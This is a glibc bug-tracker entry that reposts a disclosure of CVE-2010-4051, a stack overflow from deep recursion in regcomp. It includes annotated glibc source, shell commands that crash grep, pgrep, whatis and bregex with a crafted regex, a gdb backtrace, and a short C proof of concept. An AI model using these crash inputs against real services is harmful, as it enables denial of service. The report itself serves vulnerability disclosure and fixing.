This is the mail archive of the
glibc-bugs@sourceware.org
mailing list for the glibc project.
[Bug regex/18013] New: Stack overflow due to deep recursion in regcomp (CVE-2010-4051)
- From: "fweimer at redhat dot com" <sourceware-bugzilla at sourceware dot org>
- To: glibc-bugs at sourceware dot org
- Date: Tue, 24 Feb 2015 12:39:54 +0000
- Subject: [Bug regex/18013] New: Stack overflow due to deep recursion in regcomp (CVE-2010-4051)
- Auto-submitted: auto-generated
https://sourceware.org/bugzilla/show_bug.cgi?id=18013
Bug ID: 18013
Summary: Stack overflow due to deep recursion in regcomp
(CVE-2010-4051)
Product: glibc
Version: unspecified
Status: NEW
Severity: normal
Priority: P2
Component: regex
Assignee: unassigned at sourceware dot org
Reporter: fweimer at redhat dot com
CC: drepper.fsp at gmail dot com
This is the first report from <http://seclists.org/fulldisclosure/2011/Jan/78>,
included below:
- --- 1. RE_DUP_MAX overflow ---
The main problem exists in regcomp(3) function of GNU libc
implementation. Let`s try understand..
- ---
int
regcomp (preg, pattern, cflags)
regex_t *__restrict preg;
const char *__restrict pattern;
int cflags;
{
- ---
if we use '{', token type will be OP_OPEN_DUP_NUM.
- ---
/* This function parse repetition operators like "*", "+", "{1,3}" etc. */
static bin_tree_t *
parse_dup_op (bin_tree_t *elem, re_string_t *regexp, re_dfa_t *dfa,
re_token_t *token, reg_syntax_t syntax, reg_errcode_t *err)
{
bin_tree_t *tree = NULL, *old_tree = NULL;
int i, start, end, start_idx = re_string_cur_idx (regexp);
re_token_t start_token = *token;
if (token->type == OP_OPEN_DUP_NUM)
{
end = 0;
start = fetch_number (regexp, token, syntax); <===== CONVERT VALUE
- ---
let`s see fetch_number =>
- ---
static int
fetch_number (re_string_t *input, re_token_t *token, reg_syntax_t syntax)
{
int num = -1;
unsigned char c;
while (1)
{
fetch_token (token, input, syntax);
c = token->opr.c;
if (BE (token->type == END_OF_RE, 0))
return -2;
if (token->type == OP_CLOSE_DUP_NUM || c == ',')
break;
num = ((token->type != CHARACTER || c < '0' || '9' < c || num == -2)
? -2 : ((num == -1) ? c - '0' : num * 10 + c - '0'));
num = (num > RE_DUP_MAX) ? -2 : num;
}
return num;
}
- ---
now see regex.h to know, what value have RE_DUP_MAX
- ---
/* Maximum number of duplicates an interval can allow. Some systems
(erroneously) define this in other header files, but we want our
value, so remove any previous define. */
# ifdef RE_DUP_MAX
# undef RE_DUP_MAX
# endif
/* If sizeof(int) == 2, then ((1 << 15) - 1) overflows. */
# define RE_DUP_MAX (0x7fff)
#endif
- ---
calc_eclosure_iter() will call to calc_eclosure_iter() match time. and
crash in malloc(3). Simple Recursion.
so we can't use value bigger 0x7fff in {n,}. regcomp(3) should return
ERROR if we use more that one time '{' token.
They are many vectors attack
grep(1):
cx () cx64:~$ ls |grep -E ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault
pgrep(1):
cx () cx64:~$ pgrep ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault
bregex from bacula-director-common
cx () cx64:~$ bregex -f glob-0day.c
Enter regex pattern: .*{10,}{10,}{10,}{10,}{10,}
Segmentation fault
whatis(1):
cx () cx64:~$ whatis -r ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault
and more like proftpd.
Simple crash for CVE-2010-4051
(gdb) x/i $rip
=> 0x7ffff7ad3ea2: mov %eax,0x50(%rsp)
(gdb) x/i $eax
0x2: Cannot access memory at address 0x2
(gdb) x/i $rsp
0x7fffff5fef90: Cannot access memory at address 0x7fffff5fef90
(gdb) x/i 0x50($rsp)
Cannot access memory at address 0x7fffff5fef08
#0 0x00007ffff7ad3ea2 in ?? () from /lib/libc.so.6
#1 0x00007ffff7ad538e in malloc () from /lib/libc.so.6
#2 0x00007ffff7b17d9b in ?? () from /lib/libc.so.6
#3 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6
#4 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6
#5 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6
#6 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6
#7 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6
...
- ---PoC1---
#include <regex.h>
int main(){
regex_t preg;
// char fmt[]=".*{10,}{10,}{10,}{10,}"; // CVE-2010-4052
char fmt[]=".*{10,}{10,}{10,}{10,}{10,}"; CVE-2010-4051
regcomp (&preg, fmt, REG_EXTENDED);
return 0;
}
- ---PoC1---
--
You are receiving this mail because:
You are on the CC list for the bug.